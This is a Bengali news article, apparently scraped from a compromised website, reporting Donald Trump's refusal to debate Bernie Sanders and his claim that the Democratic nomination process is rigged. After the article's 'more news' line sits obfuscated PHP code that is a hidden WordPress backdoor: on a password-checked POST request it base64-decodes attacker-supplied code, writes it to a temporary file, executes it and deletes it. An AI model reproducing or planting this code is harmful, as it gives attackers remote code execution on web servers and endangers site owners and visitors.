সোমবার, ১৭ই জুন, ২০২৪ খ্রিস্টাব্দ ৩রা আষাঢ়, ১৪৩১ বঙ্গাব্দ

‘আমি দ্বিতীয় স্থানে থাকা কারো সঙ্গে বিতর্ক করি না’

 

আন্তর্জাতিক ডেস্ক :বার্নি স্যান্ডার্সের সঙ্গে বিতর্কের প্রসঙ্গ উড়িয়ে দিলেন ডোনাল্ড ট্রাম্প। তিনি বললেন, দুঃখিত। আমি দ্বিতীয় স্থানে থাকা কারো সঙ্গে বিতর্ক করি না। অথচ মাত্র দু’দিন আগে তিনি ডেমোক্রেট দল থেকে আগামী প্রেসিডেন্ট নির্বাচনে মনোনয়ন প্রত্যাশী ভারমন্টের সিনেটর বার্নি স্যান্ডার্সের সঙ্গে টেলিভিশনে বিতর্ক করার প্রস্তাব দেন। কিন্তু সেই অবস্থান থেকে রিপাবলিকান দলের ‘গৃহীত মনোনীত’ প্রার্থী ডোনাল্ড ট্রাম্প সরে যাচ্ছেন বলে অভিযোগ করেছেন বার্নি স্যান্ডার্স। তার সঙ্গে শুধু বিতর্কে যাওয়ার বিষয়ই উড়িয়ে দেন নি ট্রাম্প।

donald-trump-slams-pfizers-disgusting-megamerger

একই সঙ্গে তিনি ডেমোক্রেট দলের মনোনয়ন প্রক্রিয়ার সমালোচনা করেছেন। বলেছেন, তাদের মনোনয়ন প্রক্রিয়া পুরোপুরি জালিয়াতিতে ভরা। এ খবর দিয়েছে বার্তা সংস্থা পিটিআই। এতে বলা হয়, স্যান্ডার্সকে উদ্দেশ্য করে ট্রাম্প বলেছেন, আমি এখন রিপাবলিকান দলের গৃহীত মনোনীত প্রার্থী। তাই দ্বিতীয় অবস্থানে থাকা কারো সঙ্গে বিতর্কে যাওয়া যথার্থ হবে না। জালিয়াতিতে ভরা প্রক্রিয়ায় হিলারিকে আনা হয়েছে। স্যান্ডার্সকে বিজয়ী হতে দেবেন না হিলারি এবং ডেমোক্রেটিক দলের জাতীয় কমিটির প্রধান ডেবোরাহ ওয়াসেরমান শুলটজ।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}